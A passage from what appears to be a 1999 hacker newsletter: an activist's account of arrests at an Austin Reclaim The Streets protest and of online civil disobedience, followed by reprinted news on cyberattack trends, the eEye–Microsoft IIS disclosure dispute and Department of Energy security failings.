By the time we parked the car and got inside the police station, there was already a crowd of perhaps 20 people, mostly sitting on the floor, inside the area where you ask about new arrestees. It looked like we were now reclaiming the police station, rather than the street! We weren't sure if the two young women and one young man were taken to this station. And there was speculation that they could have taken them to any number of substations throughout the city, as they are sometimes apt to do. None of the people whose idea it was to reclaim the section of the street in front of Ruta Maya were prepared for arrests, and in Austin there aren't really known activist lawyers - like in some U.S. cities - readily available to help in moments like this. Although a few of the people who ended up being in the Austin RTS action were seasoned activists, most seemed to be people who had never actually had to deal with police arrests before. Or if they had, they certainly hadn't made any arrangements in advance. So everything was handled on the spot. My girlfriend has a friend who is a lawyer who has helped her out in the past.
While she was on the phone to her, others were over at the main desk waiting to hear if in fact the three were at this station and what they were being held for. Finally, at some point between 9:30 and 10:00 we learned that yes in fact the three had been brought to this station, and what the charges were. One was charged with a Class C misdemeanor for refusing to obey the order of a police officer. Another was charged with a Class C misdemeanor for disorderly conduct. But the third was charged with a Class B misdemeanor, a more severe level, for "inciting a riot." First of all, there was no riot, by any stretch of the imagination. But more importantly, the young woman charged with inciting a riot - as I later learned - had merely begun to yell out a cheer. She had said, "Give me a 'P'," - and was probably going to spell "PIG" - at which point the cops lurched forward to grab her from out of the crowd. My girlfriend's friend who is a lawyer advised us that it would be best if a boisterous crowd did not linger in the police station waiting area as it might only antagonize them and encourage them to hold the three longer. So a group drifted off and went to Lovejoys - the bar where we had started the evening off earlier. My girlfriend and I, and a couple of friends of the people being detained, remained at the police station. We learned that the two with Class C misdemeanors would be able to be released for $200 bond, although it wouldn't be until much later in the night, actually the wee hours of the morning, but that the young woman charged with inciting a riot would have to wait until a judge came at 10:30 in the morning. When we saw that it was senseless to wait at the police station any longer, the rest of us left as well, joining others back at Lovejoys where we drank from pitchers of beer, mulled over what had just transpired, and continued an earlier thread about some of the internal dynamic of the new warehouse space in Austin called Pueblos Unidos. 
THE NEXT MORNING

In the middle of the night the two with Class C misdemeanors were bailed out. And at 10:30 or so on June 19, my girlfriend's lawyer friend - a bit begrudgingly - had to go down to the station to deal with the magistrate and help the one with the inciting riot charge get released. My girlfriend went back to the police station in the morning as well - in part to console her lawyer friend who had had to be bothered on a Friday evening she was spending with her husband who works out of town all during the week. She was able to help get the one with the inciting riot charge out of jail, by being able to visit her while in custody and explain the procedure for getting a personal release - but did not agree to be the lawyer for these cases. Compounding factors were that two of the people arrested, including the one with the inciting a riot charge, had just returned to the country - literally on the afternoon of June 18 - after having been in Guatemala and Mexico. Now, a criminal lawyer will need to be found. People will have to spend precious and limited resources on the entire legal process. Those who must return to court will have added stress and worry. And what started out as an evening of revelry ends up in the onerous world of the courts.

AFTERTHOUGHTS ON THE REAL

Several things are clear. While a degree of planning for this action was undertaken - in that minimally a date, time, and place were chosen and the action was given some form and content - there definitely were important elements in the planning process that were overlooked. The first, obviously, being that the people whose intent it was to reclaim the street should have realized that this sort of activity generally falls outside the boundary of the law, that the police were likely to show up, and that arrests were possible. And that given the possibility of arrest, contingency plans should have been made: i.e.
there should have been a lawyer on standby and even some sort of legal observer. The second oversight was that there was no attention given to drawing in media, nor were any of the participants using any audio or video recording devices. No photographs nor any videotape of the above arrests were made to supply concrete evidence demonstrating that in fact the Class B misdemeanor inciting to riot charge is ludicrous. And finally it seems that the nature and purpose of the action was not made clearly manifest to passersby or to unconnected people sitting inside or outside of Ruta Maya. All of these things - legal preparation, media work, and public relations - are aspects of street actions that are fairly important. And there are clearly people in Austin who have strong skills in all of these areas and whose services could have been called upon. I'm not sure, but I think the Austin RTS action was a last minute one, pulled off by just a few people who didn't have time to do everything needed. I don't want to sound too critical. During the moment - albeit a short one - there was a temporary autonomous zone. People did in fact reclaim a portion of a street. But the cost of doing this is that several people now unwittingly must face the hassle and expense of the court system.

HYBRIDITY: THE VIRTUAL AND THE REAL

One year ago I wrote a few short pieces with the theme of hybridity, talking about the goal of developing actions that combined on-line (virtual) and off-line (real) elements. In part this was a reaction to criticism the Electronic Disturbance Theater received which claimed that by acting purely in the virtual realm we were isolating ourselves from people who focused more or all of their attention on doing things in the street or in the flesh.
We tried to introduce this idea of Electronic Civil Disobedience to the community of activists who every year, for the past few anyway, have gone to the School of the Americas to participate in the more traditional civil disobedience style of action. And at a national conference on civil disobedience held in Washington, DC, this past January, two from the EDT were part of a panel discussion on Electronic Civil Disobedience. Even so, this notion of joint computer-based and street-based actions has a long way to go. There is still a disjuncture, a gap, between what's happening now on the Net and what people are doing on the street. Many people engaged in yesterday's street action in Austin, for example, probably had no idea that the virtual component was even taking place. EDT's participation in the global RTS actions is another step in developing both the theory and practice of this sort of joint engagement. The Internet is inherently global and so Internet-based actions seem to be a logical match with global street actions. But this is not to say that the particular example of FloodNet is the most ideal way of meshing the street and Net together. The FloodNet action is something that individuals may join from their computers at home, work, or in an educational environment. Even though acting simultaneously, jointly, the participants in the on-line and off-line actions in this case may have been completely different sets of people. What can be done differently? Some examples from Amsterdam and London over the course of the last few years are instructive. During demonstrations against a meeting of the EU in Amsterdam - which involved massive police presence in the streets - people created web pages in which they mapped out the location of the police. The pages were constantly updated with relevant information to demonstrators from people sending in email messages or calling in from pay phones or cell phones. 
In another example, in London during an occupation/takeover of a Shell office, activists used a portable laptop connected to a cell phone to send out announcements to the media and others once they were inside. They were also able to directly update a web site during the occupation.

Austin's Reclaim The Street action was about as low tech as you can go. The most sophisticated technology was probably the bicycles used for the first part of the action. Clearly there was no digital technology. No interface with the Net. The closest to this was probably when my girlfriend used the payphone right in front of Ruta Maya to unsuccessfully call media as the police were making arrests. For a moment she tapped into the telephone infrastructure - which is basically what the Internet is. What would have happened or what could happen in the future if we are able to enhance these sorts of street actions with a real-time audio and video presence? Imagine if on the elevated sidewalk in front of Ruta Maya and out on the street several people had had video cameras and they were taping the entire action. Further imagine that there were cables running from the cameras to the interior of the café where people were sitting with laptop computers capable of handling video input and these laptops were connected to a phone line in the café - a live stream of audio and video being netcast about the RTS action to a global audience. Video recording and netcasting the street action may not have prevented people from being arrested, but it certainly would have captured a public record and people other than the participants and the observers at Ruta Maya would have known about it. As it stands there is no recorded imagery or audio of the Austin RTS action. Nor have there been any reports about it in the local media. Nor does anyone on the Net - apart from those reading this - know about it.
One would think that in a town such as Austin - one credited as having one of the fastest growing economies in the U.S. largely linked to the high tech computer industry - that activists here would have the wherewithal to develop these sorts of uses of seemingly readily available digital technology. But there are obstacles. Some of the obstacles are ideological, perhaps. A lingering anti-technology critique. Some of the obstacles are economic. A genuine lack of access. Some obstacles may simply be that the ideas are still new.

To conclude - well at least to stop, concluding may be too premature right now - in addition to an obvious need for more attention to some basic legal, media, and publicity training, there is a need to think about and to experiment more with ways of bringing the street and the Net closer together. We should address this question: how do we bring what is happening on the street onto the Net? The Zapatista FloodNet action in conjunction with the global Reclaim The Street actions is an example of real-virtual hybridity at a world-wide level. But it is only one form and it lies within the area of Internet as site for resistance and direct action. Finally, then, it seems there are at least two important areas where further exploration is needed: the first, greater experimentation with other forms of on-line action and electronic civil disobedience to be used jointly with actions on the street; the second, greater experimentation with bringing the street and the Net closer together so that what happens on the street is netcast in real-time onto the Net to a global audience.

END

@HWA

53.0 Cyber Attacks in Australia Double
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 17th 1999

From HNN http://www.hackernews.com/

contributed by Code Kid

The Australian Computer Emergency Response Team (AusCERT) is claiming that cyber attacks in Australia have doubled over the last year.
They claim that there has been a sharp rise in DoS attacks and recommend that companies have strong security and policies in place.

Sydney Morning Herald
http://www.smh.com.au/news/9906/16/text/business4.html

Australian Computer Emergency Response Team
http://www.auscert.org.au/

Sydney Morning Herald;

On guard against hacker attacks
Date: 16/06/99
By KIRSTY NEEDHAM

The average hacker is no longer a clever but disgruntled techno-geek. Security experts warned yesterday that dangerous programs, ready for download and use against corporate Web sites, were being uncovered by simple keyword searches on the Internet.

Hacker attacks in Australia have doubled this year, according to the Australian Computer Emergency Response Team (AusCERT), which has seen around 1,500 incidents. AusCERT is part of an international organisation, CERT, that co-ordinates efforts against Internet security breaches.

One of the latest security problems has been a rise in "denial of service" attacks, where a Web site is crippled by a flood of requests for information. "This can be easy to do and there are tools available to would-be hackers," said Mr Eric Halil, AusCERT operations manager. "You don't have to be an expert to use them."

Mr Halil said many Web sites were also being "probed" by automated scanning tools. "It is difficult to determine what the motives are. Some people are joy riders - they like to break and enter systems. "Others like breaking into well-known systems like financial institutions. They earn kudos with their peers," he said.

A Forum of Incident Response and Security Teams (FIRST) conference in Brisbane this week is being attended by members from the military, business, government and academia in 22 countries.

"Incidents tend to be international in nature.
Even the local hacker around the corner breaking into a university will break in overseas first to cover the trail," said Mr Byron Collie, an agent with the Australian Federal Police who is on secondment to the Australian defence forces' directorate of information warfare.

The FBI estimates that 80 per cent of attacks are made by disgruntled employees, with 20 per cent coming from outside the organisation. However, Mr Collie said this was shifting towards 50 per cent as companies failed to take adequate security measures.

"Organisations need to have a security policy in place, including incident response procedures, if they want to conduct e-commerce or have any connectivity to the Internet," said Mr Collie. "Early law enforcement contact and protocols in handling evidence will ensure it is admissible in court. If it is left until the last minute or files have been bandied around in e-mail, it jeopardises prosecutions."

Mr Mowgli Assor, a computer security specialist with Ohio State University, said there had been an increase in both hacking incidents and the tools available to attack computer networks. Infoguard, an incident response team set up by the FBI in March, was part of a move by the US Government to raise awareness of computer attacks, Mr Assor said. A reluctance by embarrassed companies to report attacks to the police or FBI had been seen as a problem, he said.

"Disgruntled teenagers are growing up and not shedding their ways. Hackers have been becoming smarter and taking more careful approaches. Break-ins are harder to detect and protect against," Mr Assor said.

@HWA

54.0 SmartCards Next Stop for Internet Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(Next stop? It's already happening, see section 20.0 ... -Ed)

June 17th 1999

From HNN http://www.hackernews.com/

contributed by chippy

The Australian Institute of Criminology has released a report that claims that SmartCards will be the next stop for high-tech criminals.
These new crimes will force officials to develop new forensic processes and tools to be able to extract data from such small storage devices.

Australian Financial Review
http://www.afr.com.au/content/990616/inform/inform2.html

Australian Institute of Criminology
http://www.aic.gov.au/

Australian Financial Review;

Smartcards may be set to revolutionise crime
By Helen Meredith

Cyber crimebusters warn that smartcards will be the next target for digital law breakers, with the technology lending itself to concealment of data from law enforcement agencies.

According to a report released yesterday by the Institute of Criminology, smartcards may have the single greatest impact on the conduct of crime in our society with their ability to store, process and secure significant quantities of data. They are expected to make the job of policing and bringing cyber criminals to book complicated, with experts forced to develop new forensic processes and tools that will enable them to analyse and extract data from digital storage devices such as smartcards.

Entitled What is Forensic Computing? the AIC report was released to coincide with the opening of an international conference in Brisbane on the handling of computer security incidents.

The Federal Minister for Justice, Senator Amanda Vanstone, speaking during the plenary session of the FIRST Conference, said: "We are used to seeing computer hackers portrayed in the media as youthful idealists who are simply engaging in a bit of mischievous fun." This did not match up with the reality of computer crime, she said. Damaging digital data and communications had the potential to ruin businesses and seriously affect national economic interests, with criminals using digital technology both to commit crimes and hide their activities.
Senator Vanstone said a survey of businesses carried out by the Office of Strategic Crime Assessment in the Attorney-General's Department, in conjunction with the Victorian Police and consultant Deloitte Touche Tohmatsu, had shown that about a third of firms in the banking, technology, communications and computer sectors had suffered unauthorised use of their systems in the previous 12 months. The proportion of these attacks originating externally had increased, a trend that was expected to continue. Until recently, most assaults on computer systems had been identified as internal, usually involving disgruntled employees.

Authorities were also concerned that about 42 per cent of businesses had not reported such external cyber intrusions. "I doubt very much that two in five businesses would fail to call in the police should the intrusion involve a physical breach of their security, such as a break and enter, even if nothing was taken," she said. The use of high-grade encryption, the loss of the human interface in financial transactions and the lack of a paper trail were serious impediments to law enforcement.

AIC director Dr Adam Graycar said investigating sophisticated crimes and assembling the necessary evidence for presentation in a court of law had become a significant issue for police. A new specialist law enforcement field, forensic computing, had arisen as a result. This involved identifying digital evidence and preserving it through the investigation process.

@HWA

55.0 Internet Was Designed without Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 17th 1999

From HNN http://www.hackernews.com/

contributed by Weld Pond

Why are viruses and 'evil hackers' seemingly running rampant all over the internet? Because in the beginning it was designed that way. Take a romp through the early formative years of the net, all in six or seven paragraphs.
Washington Post
http://www.washingtonpost.com/wp-srv/WPlate/1999-06/15/150l-061599-idx.html

Vipers In the Sandbox
Used to Be, the Internet Was a Safe Place to Play

By John Schwartz
Washington Post Staff Writer
Tuesday, June 15, 1999; Page C01

Why are the newspapers full of reports of hackers defacing government Web sites and nasty viruses wreaking havoc on computers around the world? In no small part it is a cultural problem that goes back to the '60s origins of personal computing and the Internet.

Many of the Internet pioneers were bearded longhairs, academics and engineers whose techno-hippie ethos suffused their new world. They knew each other, were part of a community. Trust was the rule. The early Internet was much more about openness and communication than walls and locks. The faults it was supposed to correct were in the machines, not in us: corrupted packets, not corrupted morals.

"Once upon a time there was the time of innocence," says Clifford Stoll, whose work tracking down European hackers became a popular book, "The Cuckoo's Egg." "Once upon a time computers were not used except in academia, where there really is nothing that's mission-critical. Once upon a time computers were mainly play toys for the techno-weirds--techie play toys."

In that environment, hacking was part of the fun of what Stoll has called the early Internet "sandbox." "In that environment, there seems to be a cachet of 'Hey! I wrote a virus! Hee-ho!' In that environment, it seems funny to break into somebody else's computer. . . . It seems somewhat innocent to read somebody else's e-mail."

It started with hacking telephone systems. The founders of Apple Computer--Steve Jobs and Steve Wozniak--got their start in business peddling "blue boxes"--little devices that allowed users to hack the telephone network and make long-distance calls for free.
These "phone phreaks" were seen by some as cultural heroes--free spirits striking a blow against the suits, the evil corporations seen as the enemies of spontaneity and creativity. Once computer systems were connected by networks, "remote hacking was an attractive challenge," Internet pioneer Vinton Cerf recalls via e-mail. "Surreptitiously making your way into the operating system from your secret hideout. . . . Much of the motivation was like picking locks or scaling walls--just to see if you could do it. Harm was not the objective, most of the time." Katie Hafner, who has written books about the history of the Internet and about the lives of hackers, says that this metaphor of nerds at play is compelling--and accurate. "It was a big open playscape for these guys," she says. "The Net was built as a completely open community. People would actually be offended if files were protected." To be sure, there were some early nods to security issues--the fledgling ARPANET, the precursor to today's Internet, required passwords. It was funded by the military, after all. However, "the subtext was this was an open community because this was an experiment," Hafner says. It was built by guys like Jon Postel, the Internet pioneer who died last year. Postel had a vision of an Internet that didn't need a center to survive, a network that could be governed by standards and consensus without ever putting anybody in charge. Utopian? Sure. Vulnerable? Uh-huh. That culture rejected attempts to create computer operating systems that incorporated security from the ground up, but were complex and cumbersome. Computer security expert Peter Neumann says: "Viruses exist only because of the shortsightedness of subsequent developers who almost completely ignored the security problems" that some designers had effectively solved. The problem is that the Net caught on, and in the biggest possible way. 
The anarchic, antiauthoritarian, don't-tell-us-how-to-run-our-lives ethic that defined the burgeoning network--and is still held out by most of the experts as the source of its vitality and strength--has retained that early vulnerability. Broader penetration of the Internet into society meant broader penetration of society into the Internet; it became more like the real world, and the real world is a tough place. In '60s terms, the idea of free spirits being outside the control of central authority was the best of all possible worlds. But with no one in charge, it was damnedly hard to plug security holes. A big wake-up call came in 1988 when Robert T. Morris Jr., then a student at Cornell University, released a computer program that single-handedly crashed systems across the Internet. His father, a famous programmer and security expert, was of the generation that had hacked for fun. Morris Jr. didn't mean to bring down the Net. "His mischief was kind of in the spirit of the Net," says Hafner. But by then the Internet was no longer a playscape, and the damage was real. Of course if the Net's problem is anarchy, the problem with personal computers is monarchy: Bill Gates. Microsoft "is indeed the evil empire when it comes to robust infrastructures," says Neumann. Two viruses that recently swept through the world's computers, Melissa and Explore.zip, took advantage of the fact that so many millions of PCs run on a suite of Microsoft's programs. The company's latest offerings include security options--but the options are turned off at the factory. The security measures make computing a little clunkier, and cut users off from some of the bells and whistles that Microsoft writes into its programs. Says computer security expert Eugene Spafford of Purdue University, it's as if consumers "said they wanted faster cars," and so the vendors maximize speed by providing "faster cars, but with no brakes and no air bags!" 
Release a virus that attacks that company's software specifically, and "it's analogous to the Spaniards bringing smallpox to the Incas," he says. "There was no immunity--they just wiped everybody out. . . . We've really set up our environment in an unsafe way."

Of course today's Internet is a mirror of society. It may have been conceived in a spirit of trust and information wanting to be free and good practical jokes. But today it's about--money. The frontier is getting settled by corporations worth billions, all of which are promising to sell us our future. They have to deliver, so anti-virus programmers and network security consultants have a market opportunity.

It's a tough time for a system that was created in an age of innocence. It will be interesting to see if a network strong enough to survive nuclear attack can survive its own success.

© Copyright 1999 The Washington Post Company

@HWA

56.0 Original Apple I On the Auction Block
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 17th 1999

From HNN http://www.hackernews.com/

contributed by Cuda

What is being called the first Apple I ever sold will soon be sold via auction. The Auctioneers are expecting bids to go well over $40,000. One of approximately 200 that were ever built, this one includes original documentation including the original 8-page manual. The auction company will accept absentee bids online. Better hurry. The live bidding starts on Tuesday June 29, at 11 a.m.

La Salle Auctions
http://www.lasallegallery.com/framemac.htm

@HWA

57.0 Microsoft Calls eEye Irresponsible
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 18th 1999

From HNN http://www.hackernews.com/

contributed by Weld Pond

A week after notifying Microsoft of a major hole in its Internet Information Server 4.0 eEye Digital Security Team went public with the information and published an exploit for the hole. The Microsoft spin machine labeled this action as 'Irresponsible'.
The finger here should not be pointed at eEye who did the honorable thing by alerting the public and posting a real fix before Microsoft, but should instead be pointed at Microsoft for creating bad software, and even worse, concealing the information for up to a week. Unfortunately these articles don't seem to understand that.

LA Times
http://www.latimes.com/HOME/BUSINESS/t000054445.html

Nando Times
http://www.techserver.com/story/body/0,1634,61071-97188-693078-0,00.html

The UK Register
http://www.theregister.co.uk/990618-000010.html

Associated Press - Via San Jose Mecury News
http://www.mercurycenter.com/breaking/docs/078774.htm

InfoWorld
http://www.infoworld.com/cgi-bin/displayStory.pl?990617.hneeye.htm

eEye Digital Security Team
http://www.eeye.com/

Microsoft
http://www.microsoft.com/security/bulletins/ms99-019.asp

Late Update

Well, at least Forbes gets it.

Forbes
http://www.forbes.com/tool/html/99/Jun/0618/mu5.htm

Forbes;

Microsoft's security secret
By Benjamin Polen

NEW YORK. 12:45PM EDT—Microsoft’s (nasdaq: MSFT) failure to immediately alert customers of a serious security flaw in its Internet Information Server (IIS) could hurt the company’s image and cost it customers as the software giant tries to establish a position within the competitive marketplace of mission-critical server applications.

Microsoft knew about the vulnerability for a week but tried to delay telling customers until it could prepare a software patch. But Microsoft’s efforts to suppress notification of the IIS bug ultimately backfired and proved embarrassing when eEye, a privately held network security company, took the information to the public on Tuesday. eEye detected the bug during a beta test of a security program and alerted Microsoft of the problem on June 8.
The vulnerability is so severe that anyone with modest programming skills and an Internet connection can gain complete control over a web server running IIS, which runs on 22.3% of the web servers on the Internet, according to research firm Netcraft. Despite the severity of the problem, Microsoft stopped responding to eEye's E-mails after June 11, according to Firas Bushnaq, CEO of eEye. After several days, eEye decided to post an advisory on its web site on Tuesday. The CERT Coordination Center, a federally funded computer security research institute at Carnegie-Mellon University, posted an advisory on the following day, lending credence to eEye's concerns. Firas Bushnaq said his company acted because Microsoft was "not taking the vulnerability seriously." When Microsoft still had not publicly acknowledged the vulnerability six hours after eEye posted the advisory, the security company went a step further and published source code that could be used against the IIS bug. "When it was at that level, we decided we had to release the exploit, we would definitely get more attention," said Bushnaq. For its part, Microsoft was not pleased with eEye’s decision to issue an advisory, much less any source code that could be used against their product. Microsoft deems eEye’s full disclosure decision as "irresponsible" and "beyond comprehension," according to Jason Garms, Microsoft’s lead product manager for Windows NT security. The disagreement between Microsoft and eEye highlights a burgeoning culture clash in the computer world where traditional corporate secrecy collides with the free-information ethos of the Net. On its web site, eEye explained why it felt justified in posting the advisory and the source code. "Our responsibility to our clients and the whole network community is to disclose as many details as possible.… This is the way we can contribute to the security community and keep software vendors working hard at producing more robust products." 
For its part, Microsoft hoped that by keeping knowledge of the vulnerability secret, it could protect its customers until a patch had been developed and tested.

"Frankly, the feedback from customers is that they don’t want us to go and publicize our bugs before we have fixes for our problems," Garms said.

But at least one industry analyst questions Microsoft’s handling of the situation.

"If you want your customers to depend on your products for mission-critical applications, then you have to avoid at all costs any kind of behavior that suggests you’re not to be trusted and you’re not dependable," said Eric Hemmendinger, a senior analyst at the Aberdeen Group. "Having a problem occur is one thing. But not acknowledging it is another issue altogether. For that people should hold them accountable."

Hemmendinger compared Microsoft’s attitude toward corporate information technology managers with that of a rude guest. "It’s like an immature person being invited to the party and not behaving responsibly. This is not the kind of behavior that gets you invited back to the party," he said.

The situation could come back to haunt Microsoft as it tries to attract new corporate customers.

"If you are considering using IIS and you become aware of things like this in Microsoft's behavior you got to take this into consideration," Hemmendinger said. "If they really want to be accepted in the data center this is not the right behavior."

-=-

UK register; Posted 18/06/99 12:33pm by John Lettice

Major MS Web Server security hole exposed, plugged

Security outfit eEye has roused Microsoft's ire and garnered itself some cheap publicity by going public with information on what it says is a serious security flaw in Microsoft's Internet Information Server (IIS) 4.0. The move hasn't helped the company's relationship with Microsoft any, but it seems to have triggered the appearance of a swift patch, full fix to follow.
According to eEye the flaw allows arbitrary code to be run on any web server running IIS 4.0, and by using a buffer overflow bug in the software attackers can remotely execute code to enable access to all data on the server." So it's a serious one, although Microsoft says it hasn't had any reports of the security hole being used so far.

eEye accuses Microsoft of failing to give the problem the attention it deserved. The company claims to have hassled MS for days, but "after the fifth day of reporting the bug to Microsoft, they stopped responding to our emails." So the company went public with the problem three days later, as an attempt to force Microsoft's hand.

Microsoft swiftly posted a patch, but accuses eEye of irresponsibility in publicising a problem before a fix had been found. There's some justification in that, but there's also some in the view that being able to announce "we've found a hole, but we fixed it" is better than having to confirm "Yike, there's a huge security hole in our product." ®

@HWA

58.0 Has the FBI Overreacted?
~~~~~~~~~~~~~~~~~~~~~~~~

June 18th 1999

From HNN http://www.hackernews.com/

contributed by Weld Pond

Scott Peterson has some interesting commentary about the recent crackdown of the FBI on web graffiti artists. The government has compared recent cracks to the use of terrorist weapons such as chemical and biological weapons. Mr. Peterson says it is nothing of the sort and that the recent crackdown fosters images of McCarthyism. Definitely some interesting viewpoints here and worth the time to read.

PC Week
http://www.zdnet.com/pcweek/stories/news/0,4153,406619,00.html

** Sorry the ZDNet nazis have cut and paste prevention in their html code so I couldn't reprint the article here. (And you can't either for personal record, wtf kind of lame action is that?).
The reason I do reprint the articles is because often times (see previous section links for examples) the stories are unavailable or pay only for archives; if anyone knows how to thwart ZDNet's (or anyone else's) anti cut and paste tactics email me hwa@press.usmc.net! and no, view source doesn't work either ...

59.0 Printer at Spa War Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 18th 1999

From HNN http://www.hackernews.com/

contributed by Silicosis

Ron Broersma, from the Space and Naval Systems Warfare Center, has claimed that Russians were able to redirect print jobs destined for a local printer back to Russia. While such a hack is possible in theory the difficulties of doing so would make it seem unlikely. DNS cache corruption seems like the most likely scenario. It is too bad that Mr. Broersma did not respond to the authors of this article with confirmation.

CMP Net
http://www.techweb.com/wire/story/TWB19990617S0007

Russians Hack U.S. Printer
(06/17/99, 10:56 a.m. ET)
By Lee Bruno and Robin Gareiss, Data Communications

Welcome back, Cold War. It looks as though the Russians might be up to their old tricks, if the infiltration of the network at the Space and Naval Systems Warfare Center (Spa War) in San Diego, Calif., is any indication.

The incursion was discovered by Ron Broersma, a Spa War network operations engineer, when a local network print job took an unusually long time. Monitoring tools revealed a file had been hijacked from the printing queue, sent to a server in Russia, and finally back to the Spa War printer.

Broersma concluded the network intruder had hacked into the printer, and reconfigured routing tables on equipment elsewhere on the Spa War network to ship the file to Russia.

Broersma relayed his account of the network printer hack at a recent meeting of the North American Network Operators' Group.
He said he secured Spa War's printers after the attack by resetting router filters, and by eliminating older printers that, he said, are especially vulnerable. "It turned out to be a real tough problem for us," he said.

Broersma has not returned subsequent phone calls for further comment, however. It's also not known who the Russian server belonged to, or what information was compromised.

Networked printers are known to be especially vulnerable to hacking attacks. They have their own IP addresses, and they run various standard protocols that can be exploited. To make matters worse, printer vendors haven't added any strong security features to their products that would protect them against break-ins.

@HWA

60.0 Popular Singapore Sites Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 18th 1999

From HNN http://www.hackernews.com/

contributed by lamer

Two high profile sites in Singapore were recently defaced: MediaCity and Television Corporation Of Singapore. Unfortunately no mirrors of either site are available.

The Electric New Paper
http://newpaper.asia1.com.sg/spore/nplo05.html (link dead)

@HWA

61.0 DOD Says its CRAP! (Mustn't be Scottish)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 18th 1999

From HNN http://www.hackernews.com/

DOD Labels Software as 'Crap'

contributed by Code Kid

Art Money, senior civilian IT official for the Defense Department, while speaking at the GovTechNet International Conference in Washington, D.C, said "The quality of software we're getting from vendors today is crap, vendors are not building quality in."

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-crap-6-17-99.html

JUNE 17, 1999 . . . 15:17 EDT

Contractors' software 'crap,' says top DOD IT official

BY BOB BREWIN (antenna@fcw.com)

The Pentagon's top information technology official sharply criticized, in the plainest possible language, the quality of software that IT contractors currently supply to the Defense Department.

"The quality of software we're getting from vendors today is crap," said Art Money, senior civilian official, who is acting as assistant secretary of Defense for command, control, communications and intelligence. "Vendors are not building quality in," Money said today at the GovTechNet International Conference in Washington, D.C. "We're finding holes in it."

DOD buys hundreds of millions of dollars worth of software each year, including everything from shrink-wrapped packages designed to run on the desktop to customized systems running millions of lines of code.

The quality of much of the software that DOD is receiving is so poor, Money said, that he is worried about the future of the U.S. software industry.

Money predicted that if the U.S. software industry does not get its act together, it could suffer the same fate as the U.S. automobile manufacturing industry, with software sales moving offshore to Japan, for example.

@HWA

62.0 DOE Still Unsecure
~~~~~~~~~~~~~~~~~~~

June 18th 1999

From HNN http://www.hackernews.com/

contributed by Space Rogue

Even after one of the worst cases of spying in US history a special investigative report has found that the Department of Energy is not taking computer security seriously. The report labels computer security practices at DOE as "naive at best and dangerously irresponsible at worst."

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-report-6-16-99.html

Science at its Best, Security at its Worst - DOE Security Report
http://jya.com/pfiab-doe.htm

Federal Computer Week;

JUNE 16, 1999 . . . 17:24 EDT

Cybersecurity holes persist at DOE labs, study finds

BY DANIEL VERTON (dan_verton@fcw.com)

Despite what may be the worst spy case in U.S. history involving nuclear weapon design data, the computer networks at the nation's five weapons laboratories continue to be "riddled with vulnerabilities," according to a report by a special investigative panel of intelligence and security officials.
According to the report, "Science at its Best, Security at its Worst," issued this month by the President's Foreign Intelligence Advisory Board, midlevel managers throughout the Energy Department have responded to the recent Chinese spy scandal with a "business as usual" attitude, while foreign nationals residing in "sensitive countries" continue to have unmonitored remote dial-up access to lab networks.

The three-month study uncovered recurring problems with DOE's computer security program, including poor labeling and tracking of computer media, problems with lax password enforcement on laboratory computer workstations and a significant failure to control access to sensitive and classified networks.

Computer security methods throughout DOE over the last two decades have been "naive at best and dangerously irresponsible at worst," the report said. In fact, "computer systems at some DOE facilities were so easy to access that even department analysts likened them to 'automatic teller machines,' [allowing] unauthorized withdrawals at our nation's expense," the report said.

Security audits also uncovered what the report calls "remarkable" lapses in addressing security problems and procedural gaps at many DOE labs. According to the report, it took DOE 31 months to write and approve a network security plan, 24 months to order security labels for mislabeled software, 20 months to ensure that improperly stored classified computer media had been safeguarded and 51 months to properly safeguard cryptographic material used to secure telephones. It even took 11 months to remove a deceased employee from classified document access lists, according to the report.

The report also outlined instances of classified information being placed on unclassified networks well after the department had developed a corrective action plan in July 1998.

"The predominant attitude toward security and counterintelligence among many DOE and lab managers has ranged from half-hearted, grudging accommodation to smug disregard," the report concluded.

-=-

** A few diagrams were omitted from this report, go to the url at jya to see the report with diagrams (they're most useful NOT)... - Ed

24 June 1999: Revise links to PFIAB report at the White House.
23 June 1999: Link to DOE Secretary Richardson's June 22 Senate testimony.
22 June 1999: Add notice on Senate joint hearings.

[Congressional Record: June 21, 1999 (Digest)]
From the Congressional Record Online via GPO Access [wais.access.gpo.gov]

Monday, June 21, 1999
Daily Digest
Senate
COMMITTEE MEETINGS FOR TUESDAY, JUNE 22, 1999
(Committee meetings are open unless otherwise indicated)

Senate Committee on Armed Services: with the Select Committee on Intelligence, and with the Committee on Energy and Natural Resources, and with the Committee on Governmental Affairs, to hold joint hearings on the President's Foreign Intelligence Advisory Board's report to the President: Science at its Best; Security at its Worst: A Report on Security Problems at the U.S. Department of Energy, 9:30 a.m., SD-106.

18 June 1999: Add balance of HTML conversion.

15 June 1999. Thanks to the White House Office of the PFIAB (202) 456-2352.

From: Jane_E._Baker@pfiab.eop.gov
To: jya@jya.com, dellaratta@exchangemonitor.com, jhorowitz@tribune.com, bullfrog@enteract.com, catpano@nytimes.com, jpcarson@mindspring.com
Date: Tue, 15 Jun 1999 15:34:33 -0400
Subject: PFIAB RPT

See attached file: Report of Presidents Foreign Intelligence Advisory Board, "Science At Its Best, Security At Its Worst: A Report on Security Problems at the U.S.
Department of Energy," June, 1999:
http://www.whitehouse.gov/WH/EOP/pfiab/pfiab_report.pdf (72 pages; 420K)

See attached file: Unclassified Appendix to PFIAB Report:
http://www.whitehouse.gov/WH/EOP/pfiab/appendix.pdf (34 pages; 191K)

Source: http://www.whitehouse.gov/WH/EOP/pfiab/pfiab_report.pdf

SCIENCE AT ITS BEST
__________________________
SECURITY AT ITS WORST

A Report on Security Problems at the U.S. Department of Energy

[Presidential Seal]
____________________________

A Special Investigative Panel
President’s Foreign Intelligence Advisory Board

JUNE 1999

ABSTRACT

